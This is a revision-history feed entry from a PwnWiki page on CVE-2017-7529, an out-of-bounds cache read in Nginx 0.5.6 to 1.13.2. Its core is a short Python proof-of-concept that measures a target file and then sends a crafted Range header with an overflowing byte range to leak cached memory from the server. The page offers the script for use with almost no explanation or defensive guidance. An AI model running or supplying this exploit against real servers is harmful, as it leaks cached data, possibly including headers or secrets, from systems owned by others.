https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2017-7529_Nginx%E8%B6%8A%E7%95%8C%E8%AE%80%E5%8F%96%E7%B7%A9%E5%AD%98%E6%BC%8F%E6%B4%9E%2Fzh-hant
CVE-2017-7529 Nginx越界讀取緩存漏洞/zh-hant - Revision history
2026-04-11T07:14:13Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2017-7529_Nginx%E8%B6%8A%E7%95%8C%E8%AE%80%E5%8F%96%E7%B7%A9%E5%AD%98%E6%BC%8F%E6%B4%9E/zh-hant&diff=3582&oldid=prev
Pwnwiki: Created page with "==影響版本=="
2021-05-26T14:52:03Z
<p>Created page with "==影響版本=="</p>
<p><b>New page</b></p><div><languages /><br />
==影響版本==<br />
<pre><br />
Nginx version 0.5.6 - 1.13.2<br />
</pre><br />
<br />
<br />
==POC==<br />
<pre><br />
#!/usr/bin/env python<br />
import sys<br />
import requests<br />
<br />
if len(sys.argv) < 2:<br />
print("%s url" % (sys.argv[0]))<br />
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))<br />
sys.exit()<br />
<br />
headers = {<br />
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"<br />
}<br />
offset = 605<br />
url = sys.argv[1]<br />
file_len = len(requests.get(url, headers=headers).content)<br />
n = file_len + offset<br />
headers['Range'] = "bytes=-%d,-%d" % (<br />
n, 0x8000000000000000 - n)<br />
<br />
r = requests.get(url, headers=headers)<br />
</pre><br />
<br />
<br />
==參考==<br />
http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Nginx/Nginx%E8%B6%8A%E7%95%8C%E8%AF%BB%E5%8F%96%E7%BC%93%E5%AD%98%E6%BC%8F%E6%B4%9E%20CVE-2017-7529.html</div>
Pwnwiki